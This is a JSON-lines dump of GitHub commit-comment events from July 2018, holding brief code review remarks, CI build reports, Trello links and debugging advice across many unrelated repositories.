{"id":"7947136402","type":"CommitCommentEvent","actor":{"login":"rhysd"},"repo":{"name":"rhysd/vim.wasm"},"payload":{"comment":{"id":29664913,"position":null,"line":null,"path":null,"commit_id":"8fa579f3e49397a9acc5761288330dbb8b1ebd34","created_at":"2018-07-11T00:51:59Z","updated_at":"2018-07-11T00:51:59Z","author_association":"OWNER","body":"just a mistake... at that time #5 did not exist"}},"created_at":"2018-07-11T00:51:59Z"}
{"id":"7947138141","type":"CommitCommentEvent","actor":{"login":"hacker1024"},"repo":{"name":"ResurrectionRemix-Devices/device_xiaomi_msm8996-common"},"payload":{"comment":{"id":29664915,"position":null,"line":null,"path":null,"commit_id":"6bd5ca1676139fef8566b8c85be7bc108f0a8bb4","created_at":"2018-07-11T00:52:34Z","updated_at":"2018-07-11T00:52:34Z","author_association":"MEMBER","body":"This causes bootloops (on RR). Why was it necessary?"}},"created_at":"2018-07-11T00:52:34Z"}
{"id":"7947140266","type":"CommitCommentEvent","actor":{"login":"vityou"},"repo":{"name":"willghatch/racket-rash"},"payload":{"comment":{"id":29664917,"position":null,"line":null,"path":null,"commit_id":"0b687cbbdf32445ff43f4d7909c9b8a129bc5804","created_at":"2018-07-11T00:53:27Z","updated_at":"2018-07-11T00:53:27Z","author_association":"CONTRIBUTOR","body":"yes this did fix it"}},"created_at":"2018-07-11T00:53:27Z"}
{"id":"7947143474","type":"CommitCommentEvent","actor":{"login":"masonk"},"repo":{"name":"stepancheg/rust-protobuf"},"payload":{"comment":{"id":29664922,"position":null,"line":null,"path":null,"commit_id":"ce7a84f08f7a3acba10d04fd5b2c7addf62163e9","created_at":"2018-07-11T00:54:46Z","updated_at":"2018-07-11T00:54:46Z","author_association":"NONE","body":"I see. Thanks for the heads up about stability. Since I’m going to introduce the dependency to tensorflow/rust, which has a conservative view of dependencies and stability, I will just hack around my need for text protos for now and wait until it’s more stable to send patches to tf. So, thanks for the offer, but don’t rush on releasing 3.\n\nSent from my iPhone\n\n> On Jul 10, 2018, at 5:51 PM, Stepan Koltsov <notifications@github.com> wrote:\n> \n> @masonk I was planning to release 3.0 after implementation of JSON parsing and probably serde support, but if you need it, I can do it earlier.\n> \n> But please note that unlike 1.7 and 2.0, version 3 will be an unstable development branch with frequent backward-compatibility breaks e. g. in 3.1 and no backports to previous versions, and 4.0 will be next LTS stable version when enough improvements will be implemented, not very soon.\n> \n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub, or mute the thread.\n"}},"created_at":"2018-07-11T00:54:46Z"}
{"id":"7947150275","type":"CommitCommentEvent","actor":{"login":"jmmccasland"},"repo":{"name":"shouldergiant/prototypal-ember"},"payload":{"comment":{"id":29664927,"position":4,"line":33,"path":"app/styles/components/nav-bar.scss","commit_id":"d0674bb0de00d79157a4a1e5bc173616d7ccb820","created_at":"2018-07-11T00:57:08Z","updated_at":"2018-07-11T00:57:08Z","author_association":"COLLABORATOR","body":"@shouldergiant fix this selector! 😛 "}},"created_at":"2018-07-11T00:57:08Z"}
{"id":"7947150654","type":"CommitCommentEvent","actor":{"login":"capitains-hook"},"repo":{"name":"PerseusDL/canonical-greekLit"},"payload":{"comment":{"id":29664931,"position":null,"line":null,"path":null,"commit_id":"6184ec210007e74adf4b380b5fe8f9c6937a1700","created_at":"2018-07-11T00:57:15Z","updated_at":"2018-07-11T00:57:15Z","author_association":"NONE","body":"## Global\n\n| Changed       |   Status |\n|:--------------|---------:|\n| `coverage`    |     0.12 |\n| `texts_total` |    -4    |\n\n## Words\n\n| Changed   |   Status |\n|:----------|---------:|\n| `grc`     |     -246 |\n\n## Units\n\n| Changed                                                 | Status   |\n|:--------------------------------------------------------|:---------|\n| `./data/tlg0007/tlg074/tlg0007.tlg074.perseus-eng1.xml` | Deleted  |\n| `./data/tlg0007/tlg074/tlg0007.tlg074.perseus-eng2.xml` | Deleted  |\n| `./data/tlg0007/tlg074/tlg0007.tlg074.perseus-grc1.xml` | Deleted  |\n| `./data/tlg0023/tlg001/tlg0023.tlg001.perseus-grc1.xml` | Deleted  |\n\n*[Hook UI build recap](http://ci.perseids.org/repo/PerseusDL/canonical-greekLit/4439)*\n"}},"created_at":"2018-07-11T00:57:15Z"}
{"id":"7947153985","type":"CommitCommentEvent","actor":{"login":"dagomezc"},"repo":{"name":"dagomezc/segundaprueba"},"payload":{"comment":{"id":29664941,"position":null,"line":null,"path":null,"commit_id":"b710287d5cdb15ced2fe5038993d74aab320fa30","created_at":"2018-07-11T00:58:32Z","updated_at":"2018-07-11T00:58:32Z","author_association":"OWNER","body":"cambio"}},"created_at":"2018-07-11T00:58:32Z"}
{"id":"7947155477","type":"CommitCommentEvent","actor":{"login":"wdconinc"},"repo":{"name":"JeffersonLab/remoll"},"payload":{"comment":{"id":29664946,"position":null,"line":null,"path":null,"commit_id":"99a9af7293ff90a2503b0f345af83718b63c909e","created_at":"2018-07-11T00:59:08Z","updated_at":"2018-07-11T00:59:08Z","author_association":"MEMBER","body":"No, this doesn't affect that. It seems that 613608d5b2877805c60758f19724c0e7c2c8c3cf introduced that. I probably accidentally deleted a line too many there. I do not think we should be storing the seed in multiple places, for two reasons:\r\n- G4Random is accessible as a static everywhere and has the seed so we don't need to store it in one of our own structures (and remollRunData is pretty horrible anyway). When we write the seed in remollIO (or in remollRunAction::EndOfRunAction) we should just get it from G4Random directly.\r\n- The single seed is technically a shortcut for the full random state. Therefore, storing only a seed is not guaranteed to be sufficient. The full state is much larger, but a general seed takes two long ints: the seed and a safety. We should probably be storing those two numbers, at least."}},"created_at":"2018-07-11T00:59:08Z"}
{"id":"7947162038","type":"CommitCommentEvent","actor":{"login":"streamich"},"repo":{"name":"streamich/nano-css"},"payload":{"comment":{"id":29664973,"position":null,"line":null,"path":null,"commit_id":"2d9c209f3883193eea507815d5f417d518a99250","created_at":"2018-07-11T01:01:32Z","updated_at":"2018-07-11T01:01:32Z","author_association":"OWNER","body":"Build version: __`2.1.0-renovate/node-8.11.33`__ :crossed_fingers: [`renovate/node-8.11`](https://github.com/streamich/nano-css/tree/renovate/node-8.11) on [*CircleCI*](https://circleci.com/gh/streamich/nano-css/33) :tada:"}},"created_at":"2018-07-11T01:01:32Z"}
{"id":"7947164625","type":"CommitCommentEvent","actor":{"login":"Rodrigoraitz"},"repo":{"name":"Rodrigoraitz/Teste"},"payload":{"comment":{"id":29664978,"position":null,"line":null,"path":null,"commit_id":"20f97137cad38f93322ab4087a4c86ee7f6cf300","created_at":"2018-07-11T01:02:30Z","updated_at":"2018-07-11T01:02:30Z","author_association":"OWNER","body":"Version.01"}},"created_at":"2018-07-11T01:02:30Z"}
{"id":"7947165950","type":"CommitCommentEvent","actor":{"login":"hyungkyuu"},"repo":{"name":"hyungkyuu/images-hyungkyuu"},"payload":{"comment":{"id":29664979,"position":null,"line":null,"path":null,"commit_id":"c6c1e347f2aa2ecd09a6c4b9cbde93cf2ad31a20","created_at":"2018-07-11T01:03:00Z","updated_at":"2018-07-11T01:03:00Z","author_association":"OWNER","body":"flip"}},"created_at":"2018-07-11T01:03:00Z"}
{"id":"7947179687","type":"CommitCommentEvent","actor":{"login":"jmmccasland"},"repo":{"name":"shouldergiant/prototypal-ember"},"payload":{"comment":{"id":29665003,"position":20,"line":327,"path":"app/styles/_company.scss","commit_id":"34e73c55e75c4373e5e274d8d8e27b8d2274dccc","created_at":"2018-07-11T01:08:36Z","updated_at":"2018-07-11T01:08:36Z","author_association":"COLLABORATOR","body":"@shouldergiant \r\n\r\nwhat you're doing here works, but it'd be more easily understood if you just applied `margin-bottom: 3rem` to the title directly instead."}},"created_at":"2018-07-11T01:08:36Z"}
{"id":"7947181325","type":"CommitCommentEvent","actor":{"login":"shouldergiant"},"repo":{"name":"shouldergiant/prototypal-ember"},"payload":{"comment":{"id":29665008,"position":20,"line":327,"path":"app/styles/_company.scss","commit_id":"34e73c55e75c4373e5e274d8d8e27b8d2274dccc","created_at":"2018-07-11T01:09:19Z","updated_at":"2018-07-11T01:09:19Z","author_association":"OWNER","body":"alright i'll make that change quick"}},"created_at":"2018-07-11T01:09:19Z"}
{"id":"7947182138","type":"CommitCommentEvent","actor":{"login":"lucas2213690"},"repo":{"name":"viubis/Eng.-Software"},"payload":{"comment":{"id":29665012,"position":null,"line":null,"path":null,"commit_id":"b6605c7d4e4f808d2d97684c0b5c1db227c6a0a9","created_at":"2018-07-11T01:09:40Z","updated_at":"2018-07-11T01:09:40Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Exibir informações básicas para o administrador](https://trello.com/c/pNhYLjdk/212-exibir-informa%C3%A7%C3%B5es-b%C3%A1sicas-para-o-administrador)"}},"created_at":"2018-07-11T01:09:40Z"}
{"id":"7947182258","type":"CommitCommentEvent","actor":{"login":"papachoco"},"repo":{"name":"NextThought/nti.externalization"},"payload":{"comment":{"id":29665013,"position":null,"line":null,"path":null,"commit_id":"987ef6a7ca1e36f4d5eb574c92d5eb6cda99b10b","created_at":"2018-07-11T01:09:44Z","updated_at":"2018-07-11T01:09:44Z","author_association":"CONTRIBUTOR","body":"LGTM"}},"created_at":"2018-07-11T01:09:44Z"}
{"id":"7947182818","type":"CommitCommentEvent","actor":{"login":"lucas2213690"},"repo":{"name":"viubis/Eng.-Software"},"payload":{"comment":{"id":29665015,"position":null,"line":null,"path":null,"commit_id":"9ec42724f351a8e3006b0031d562c0a055c0f16e","created_at":"2018-07-11T01:09:58Z","updated_at":"2018-07-11T01:09:58Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Exibir informações básicas para o administrador](https://trello.com/c/pNhYLjdk/212-exibir-informa%C3%A7%C3%B5es-b%C3%A1sicas-para-o-administrador)"}},"created_at":"2018-07-11T01:09:58Z"}
{"id":"7947183550","type":"CommitCommentEvent","actor":{"login":"lucas2213690"},"repo":{"name":"viubis/Eng.-Software"},"payload":{"comment":{"id":29665020,"position":null,"line":null,"path":null,"commit_id":"fa37516246addb2459e92365fb3ac974c8853489","created_at":"2018-07-11T01:10:14Z","updated_at":"2018-07-11T01:10:14Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Exibir informações básicas para o administrador](https://trello.com/c/pNhYLjdk/212-exibir-informa%C3%A7%C3%B5es-b%C3%A1sicas-para-o-administrador)"}},"created_at":"2018-07-11T01:10:14Z"}
{"id":"7947184029","type":"CommitCommentEvent","actor":{"login":"lucas2213690"},"repo":{"name":"viubis/Eng.-Software"},"payload":{"comment":{"id":29665022,"position":null,"line":null,"path":null,"commit_id":"185960c055a71026a704cb0e9369c56e328a2ba1","created_at":"2018-07-11T01:10:27Z","updated_at":"2018-07-11T01:10:27Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Exibir informações básicas para o administrador](https://trello.com/c/pNhYLjdk/212-exibir-informa%C3%A7%C3%B5es-b%C3%A1sicas-para-o-administrador)"}},"created_at":"2018-07-11T01:10:27Z"}
{"id":"7947185211","type":"CommitCommentEvent","actor":{"login":"suhailvs"},"repo":{"name":"suhailvs/django-heroku"},"payload":{"comment":{"id":29665027,"position":null,"line":null,"path":null,"commit_id":"f1cd5f6a0bf4c2b3d7a78c02eda4fa98ba0dee9e","created_at":"2018-07-11T01:10:56Z","updated_at":"2018-07-11T01:10:56Z","author_association":"OWNER","body":"to add postgresql database see [this commit](https://github.com/suhailvs/simpledjangoimageupload/commit/b574efc6a9c2e9410507f0c541901dfab85f17c5) on [simpledjangoimageupload](https://github.com/suhailvs/simpledjangoimageupload/) or see [this so question](https://stackoverflow.com/a/47118731/2351696)"}},"created_at":"2018-07-11T01:10:56Z"}
{"id":"7947186927","type":"CommitCommentEvent","actor":{"login":"tecnoholic"},"repo":{"name":"tecnoholic/Python_Basics"},"payload":{"comment":{"id":29665033,"position":null,"line":null,"path":null,"commit_id":"0d561c142317745c84b1ed09bae3202e5ca21f69","created_at":"2018-07-11T01:11:33Z","updated_at":"2018-07-11T01:11:33Z","author_association":"OWNER","body":"Some issues are present in this work."}},"created_at":"2018-07-11T01:11:33Z"}
{"id":"7947187687","type":"CommitCommentEvent","actor":{"login":"lucas2213690"},"repo":{"name":"viubis/Eng.-Software"},"payload":{"comment":{"id":29665035,"position":null,"line":null,"path":null,"commit_id":"6440ce1785067f1e285272f186a1eacef2df3167","created_at":"2018-07-11T01:11:52Z","updated_at":"2018-07-11T01:11:52Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Implementar a efetuação uma Compra e todas suas dependências](https://trello.com/c/lbATkDET/188-implementar-a-efetua%C3%A7%C3%A3o-uma-compra-e-todas-suas-depend%C3%AAncias)"}},"created_at":"2018-07-11T01:11:52Z"}
{"id":"7947188475","type":"CommitCommentEvent","actor":{"login":"jackzampolin"},"repo":{"name":"jackzampolin/tendermint"},"payload":{"comment":{"id":29665036,"position":null,"line":null,"path":null,"commit_id":"5e5bb2610df3a18bdbecc22b0e7e08e635ce1fc1","created_at":"2018-07-11T01:12:10Z","updated_at":"2018-07-11T01:12:10Z","author_association":"OWNER","body":"This line leads me to believe you have a non standard gopath/git setup that is causing the script to fail. \r\n```\r\nfatal: Unable to create '/Users/kiddyboots216/go/src/github.com/tendermint/tendermint/.git/index.lock': Permission denied\r\n```\r\nHave you tried running the commands (there are really only a couple) manually to debug this"}},"created_at":"2018-07-11T01:12:10Z"}
{"id":"7947188889","type":"CommitCommentEvent","actor":{"login":"jradwan"},"repo":{"name":"jradwan/TiVoToGo.bundle"},"payload":{"comment":{"id":29665037,"position":null,"line":null,"path":null,"commit_id":"76ade2c0d8a87fd1279a11953613da174eae8ad2","created_at":"2018-07-11T01:12:19Z","updated_at":"2018-07-11T01:12:19Z","author_association":"OWNER","body":"Thanks, @stephenwheet!"}},"created_at":"2018-07-11T01:12:19Z"}
{"id":"7947197637","type":"CommitCommentEvent","actor":{"login":"WhatifNick"},"repo":{"name":"WhatifNick/GYG-MERN-PROJECT"},"payload":{"comment":{"id":29665055,"position":null,"line":null,"path":null,"commit_id":"38b4c02a05b94f2a1ff1d5e5cabcffb14f6d9c10","created_at":"2018-07-11T01:15:40Z","updated_at":"2018-07-11T01:15:40Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [As a User and Admin, ISBAT create an order](https://trello.com/c/cphkiBdx/9-as-a-user-and-admin-isbat-create-an-order)"}},"created_at":"2018-07-11T01:15:40Z"}
{"id":"7947200363","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29665059,"position":null,"line":null,"path":null,"commit_id":"f68b858702c492251262d8785e390004942a3b55","created_at":"2018-07-11T01:16:42Z","updated_at":"2018-07-11T01:16:42Z","author_association":"NONE","body":"158913899-Add-single-sided-natural-ventilation-example-file (lgu1234) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2312 of 2312 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f68b858702c492251262d8785e390004942a3b55-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f68b858702c492251262d8785e390004942a3b55-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f68b858702c492251262d8785e390004942a3b55-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.19%25-green.png)</a>\n"}},"created_at":"2018-07-11T01:16:42Z"}
{"id":"7947202859","type":"CommitCommentEvent","actor":{"login":"adamtoakley"},"repo":{"name":"voshchinskiyvitya/VisualStudio.GitStashExtension"},"payload":{"comment":{"id":29665066,"position":null,"line":null,"path":null,"commit_id":"dbcd9f9b6349b59c1bcb02a1f98a48a40b37a818","created_at":"2018-07-11T01:17:41Z","updated_at":"2018-07-11T01:17:41Z","author_association":"NONE","body":"woot woot! looking good! Keep it up!"}},"created_at":"2018-07-11T01:17:41Z"}
{"id":"7947203353","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29665068,"position":null,"line":null,"path":null,"commit_id":"f68b858702c492251262d8785e390004942a3b55","created_at":"2018-07-11T01:17:53Z","updated_at":"2018-07-11T01:17:53Z","author_association":"NONE","body":"158913899-Add-single-sided-natural-ventilation-example-file (lgu1234) - i386-Windows-7-VisualStudio-14: OK (2932 of 2933 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n * 1 test had: EIO diffs.\n * 1 test had: ESO big diffs.\n * 1 test had: MTR big diffs.\n * 1 test had: Table big diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 623\n * Failed: 1\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f68b858702c492251262d8785e390004942a3b55-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f68b858702c492251262d8785e390004942a3b55-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.97%25-yellow.png)</a> \n"}},"created_at":"2018-07-11T01:17:53Z"}
{"id":"7947203746","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29665069,"position":null,"line":null,"path":null,"commit_id":"f68b858702c492251262d8785e390004942a3b55","created_at":"2018-07-11T01:18:03Z","updated_at":"2018-07-11T01:18:03Z","author_association":"NONE","body":"158913899-Add-single-sided-natural-ventilation-example-file (lgu1234) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f68b858702c492251262d8785e390004942a3b55-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-11T01:18:03Z"}
{"id":"7947204660","type":"CommitCommentEvent","actor":{"login":"ValarDragon"},"repo":{"name":"jackzampolin/tendermint"},"payload":{"comment":{"id":29665070,"position":null,"line":null,"path":null,"commit_id":"5e5bb2610df3a18bdbecc22b0e7e08e635ce1fc1","created_at":"2018-07-11T01:18:26Z","updated_at":"2018-07-11T01:18:26Z","author_association":"NONE","body":"Looks like go get <repo> isn't working. Are you sure you have go setup correctly @kiddyboots216 ?\r\nTry debugging why these two commands aren't working as expected:\r\n```\r\ngo get $REPO\r\ncd $GOPATH/src/$REPO\r\n```"}},"created_at":"2018-07-11T01:18:26Z"}
{"id":"7947209386","type":"CommitCommentEvent","actor":{"login":"capitains-hook"},"repo":{"name":"PerseusDL/canonical-latinLit"},"payload":{"comment":{"id":29665076,"position":null,"line":null,"path":null,"commit_id":"c74013a89e082e6e99baf691be8de68e4c2a83e0","created_at":"2018-07-11T01:20:18Z","updated_at":"2018-07-11T01:20:18Z","author_association":"NONE","body":"## Global\n\n| Changed            |   Status |\n|:-------------------|---------:|\n| `coverage`         |    -0.33 |\n| `metadata_passing` |     2    |\n| `metadata_total`   |     2    |\n| `texts_total`      |     5    |\n\n## Words\n\n| Changed   |   Status |\n|:----------|---------:|\n| `lat`     |       -1 |\n\n## Units\n\n| Changed                                                 | Status   |\n|:--------------------------------------------------------|:---------|\n| `./data/phi1351/phi001/phi1351.phi001.perseus-eng2.xml` | New      |\n| `./data/phi1351/phi002/phi1351.phi002.perseus-eng1.xml` | New      |\n| `./data/phi1351/phi003/__cts__.xml`                     | New      |\n| `./data/phi1351/phi003/phi1351.phi003.perseus-eng1.xml` | New      |\n| `./data/phi1351/phi004/phi1351.phi004.perseus-eng1.xml` | New      |\n| `./data/phi1351/phi005/__cts__.xml`                     | New      |\n| `./data/phi1351/phi005/phi1351.phi005.perseus-eng1.xml` | New      |\n| `./data/phi1351/phi001/phi1351.phi001.perseus-eng2.xml` | Failing  |\n| `./data/phi1351/phi002/phi1351.phi002.perseus-eng1.xml` | Failing  |\n| `./data/phi1351/phi003/__cts__.xml`                     | Passing  |\n| `./data/phi1351/phi003/phi1351.phi003.perseus-eng1.xml` | Failing  |\n| `./data/phi1351/phi004/phi1351.phi004.perseus-eng1.xml` | Failing  |\n| `./data/phi1351/phi005/__cts__.xml`                     | Passing  |\n| `./data/phi1351/phi005/phi1351.phi005.perseus-eng1.xml` | Failing  |\n\n*[Hook UI build recap](http://ci.perseids.org/repo/PerseusDL/canonical-latinLit/4440)*\n"}},"created_at":"2018-07-11T01:20:18Z"}
{"id":"7947210705","type":"CommitCommentEvent","actor":{"login":"luis-lavaire"},"repo":{"name":"Nitrux/znx"},"payload":{"comment":{"id":29665080,"position":null,"line":null,"path":null,"commit_id":"45eb678fa05ea850e0f375ec0f9b27ee297aa76b","created_at":"2018-07-11T01:20:49Z","updated_at":"2018-07-11T01:20:49Z","author_association":"MEMBER","body":"An AppImage is generated on Travis CI. This will enable users from any distribution to use `znx`."}},"created_at":"2018-07-11T01:20:49Z"}
{"id":"7947211328","type":"CommitCommentEvent","actor":{"login":"streamich"},"repo":{"name":"streamich/ci-scripts"},"payload":{"comment":{"id":29665083,"position":null,"line":null,"path":null,"commit_id":"c384b4e409321bace81cd51455cc78029f1cd1a5","created_at":"2018-07-11T01:21:03Z","updated_at":"2018-07-11T01:21:03Z","author_association":"OWNER","body":"Build version: __`0.10.0-renovate/node-8.11.322`__ :crossed_fingers: [`renovate/node-8.11`](https://github.com/streamich/ci-scripts/tree/renovate/node-8.11) on [*Travis*](https://travis-ci.org/streamich/ci-scripts/builds/402472271) :tada:"}},"created_at":"2018-07-11T01:21:03Z"}
{"id":"7947214343","type":"CommitCommentEvent","actor":{"login":"waxz"},"repo":{"name":"waxz/catkin_startup"},"payload":{"comment":{"id":29665089,"position":null,"line":null,"path":null,"commit_id":"b4fbbe79b8c1ea9cc61bed3ab917d4de2250cd50","created_at":"2018-07-11T01:22:15Z","updated_at":"2018-07-11T01:22:15Z","author_association":"OWNER","body":"- [ ] add initialpose sub\r\n\r\n- [ ] add reset amcl pose service\r\n\r\n- [ ] modify locate node, add locate_tf publisher\r\n\r\n- [ ] add source switcher ,test on sick driver\r\n"}},"created_at":"2018-07-11T01:22:15Z"}
{"id":"7947216293","type":"CommitCommentEvent","actor":{"login":"mwilcox12015"},"repo":{"name":"mwilcox12015/sample-cloud-native-toolchain-tutorial-20180709224216860"},"payload":{"comment":{"id":29665093,"position":null,"line":null,"path":null,"commit_id":"d7277228fc7d1bcaf113da2b266bf8fc60474ea5","created_at":"2018-07-11T01:23:00Z","updated_at":"2018-07-11T01:23:00Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/75b7b520-d5f1-436d-a6df-378d32bada9b?env_id=ibm%3Ayp%3Aus-south \"cloud-native-toolchain-tutorial-20180709224216860\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/f8568402-cff1-42bb-9d27-87a549616687?env_id=ibm%3Ayp%3Aus-south \"sample-cloud-native-toolchain-tutorial-20180709224216860\") deployed [sample-cloud-native-toolchain-tutorial-20180709224216860](https://github.com/mwilcox12015/sample-cloud-native-toolchain-tutorial-20180709224216860/releases/tag/deploy-ibm-yp-us-south-mwilcox1-us.ibm.com-test-20180711-012300 \"deploy-ibm-yp-us-south-mwilcox1-us.ibm.com-test-20180711-012300\") to [test](https://console.bluemix.net/apps/f9f0c3a5-4f23-4969-91d3-6ccfd6fa0408?env_id=ibm:yp:us-south \"ibm:yp:us-south:mwilcox1@us.ibm.com:test\"), including this commit"}},"created_at":"2018-07-11T01:23:00Z"}
{"id":"7947240950","type":"CommitCommentEvent","actor":{"login":"Nowosad"},"repo":{"name":"Robinlovelace/geocompr"},"payload":{"comment":{"id":29665134,"position":14,"line":149,"path":"02-spatial-data.Rmd","commit_id":"e8b563e6c7e1f7b9c7509372a5e58192f592559c","created_at":"2018-07-11T01:32:36Z","updated_at":"2018-07-11T01:32:36Z","author_association":"COLLABORATOR","body":"@Robinlovelace , both 17 and 68 are right, depending on a definition. \r\nThere are 17 main types, but each of them could have four versions (XY, XYZ, XYM, XYZM).\r\n17 * 4 = 68\r\n"}},"created_at":"2018-07-11T01:32:36Z"}
{"id":"7947243800","type":"CommitCommentEvent","actor":{"login":"rkagldi"},"repo":{"name":"chonddi/shootingstar"},"payload":{"comment":{"id":29665138,"position":null,"line":null,"path":null,"commit_id":"1087b50634f72a2693f53d05d9005cd158cd1e19","created_at":"2018-07-11T01:33:47Z","updated_at":"2018-07-11T01:33:47Z","author_association":"COLLABORATOR","body":"오 신기방기"}},"created_at":"2018-07-11T01:33:47Z"}
{"id":"7947247260","type":"CommitCommentEvent","actor":{"login":"Majkl578"},"repo":{"name":"phpstan/phpstan"},"payload":{"comment":{"id":29665145,"position":null,"line":null,"path":null,"commit_id":"ea30584b2aa2b605e01dbca1cc30f3fb136b990a","created_at":"2018-07-11T01:35:12Z","updated_at":"2018-07-11T01:35:12Z","author_association":"CONTRIBUTOR","body":"Yep, caching vendor/ doesn't make sense, it just opens can of worms."}},"created_at":"2018-07-11T01:35:12Z"}
{"id":"7947250379","type":"CommitCommentEvent","actor":{"login":"tolgasayin"},"repo":{"name":"botman/botman"},"payload":{"comment":{"id":29665146,"position":1,"line":21,"path":"src/Messages/Outgoing/Question.php","commit_id":"e01915c81f9fa0f1c06439d9ec81c1ddc1a2b135","created_at":"2018-07-11T01:36:24Z","updated_at":"2018-07-11T01:36:24Z","author_association":"NONE","body":"Hoşgeldin"}},"created_at":"2018-07-11T01:36:24Z"}
{"id":"7947251107","type":"CommitCommentEvent","actor":{"login":"zhwayne"},"repo":{"name":"zhwayne/WLButtonCountingDownDemo"},"payload":{"comment":{"id":29665147,"position":null,"line":null,"path":null,"commit_id":"7fe2cf8eb11283f9c10d5f2a883f19a7f9a79a80","created_at":"2018-07-11T01:36:41Z","updated_at":"2018-07-11T01:36:41Z","author_association":"OWNER","body":"@513494297 设置 alpha 只是为了和设置 button 里的 label 使用统一的 api。iOS 11 上之前确实出现过你说的这个问题，overlayLabel 并不会每次都隐藏，原因是 WLCountdownTask 中的 finishedBlcok 并没有如期调用，这一块代码是异步执行，finishedBlcok 在执行之前可能就已经被销毁。因此，后面把这里设置为同步执行。"}},"created_at":"2018-07-11T01:36:41Z"}
{"id":"7947251808","type":"CommitCommentEvent","actor":{"login":"ahanank"},"repo":{"name":"julioverne/julioverne.github.io"},"payload":{"comment":{"id":29665148,"position":null,"line":null,"path":null,"commit_id":"abfb8c15de5a5062a05f1293d0c4953409e43db6","created_at":"2018-07-11T01:36:57Z","updated_at":"2018-07-11T01:36:57Z","author_association":"NONE","body":"CyPush not working in the background properly on iOS 10 or iOS 11. Activator actions also don’t work sometimes. "}},"created_at":"2018-07-11T01:36:57Z"}
{"id":"7947252795","type":"CommitCommentEvent","actor":{"login":"MoneroOcean"},"repo":{"name":"MoneroOcean/nodejs-pool"},"payload":{"comment":{"id":29665149,"position":null,"line":null,"path":null,"commit_id":"12d701aefc4df554cfe154bfd13f82825107a9ad","created_at":"2018-07-11T01:37:20Z","updated_at":"2018-07-11T01:37:20Z","author_association":"OWNER","body":"I removed gtest install part (in apt-get) and it works fine as well."}},"created_at":"2018-07-11T01:37:20Z"}
{"id":"7947253228","type":"CommitCommentEvent","actor":{"login":"mint3000"},"repo":{"name":"mint3000/tre"},"payload":{"comment":{"id":29665151,"position":null,"line":null,"path":null,"commit_id":"766ef33ded09582177bbc4224836f0647a3c9ef5","created_at":"2018-07-11T01:37:29Z","updated_at":"2018-07-11T01:37:29Z","author_association":"OWNER","body":"Created multidev environment [tre#ci-27](https://dashboard.pantheon.io/sites/c454dff1-65c3-45c0-9b6f-c9a028680cde#ci-27).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-27-tre.pantheonsite.io/)"}},"created_at":"2018-07-11T01:37:29Z"}
{"id":"7947254230","type":"CommitCommentEvent","actor":{"login":"mint3000"},"repo":{"name":"mint3000/tre"},"payload":{"comment":{"id":29665152,"position":null,"line":null,"path":null,"commit_id":"f39cb0ab1413e3e49b29a794fa2678c0f0364c8a","created_at":"2018-07-11T01:37:53Z","updated_at":"2018-07-11T01:37:53Z","author_association":"OWNER","body":"Created multidev environment [tre#ci-30](https://dashboard.pantheon.io/sites/c454dff1-65c3-45c0-9b6f-c9a028680cde#ci-30).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-30-tre.pantheonsite.io/)"}},"created_at":"2018-07-11T01:37:53Z"}
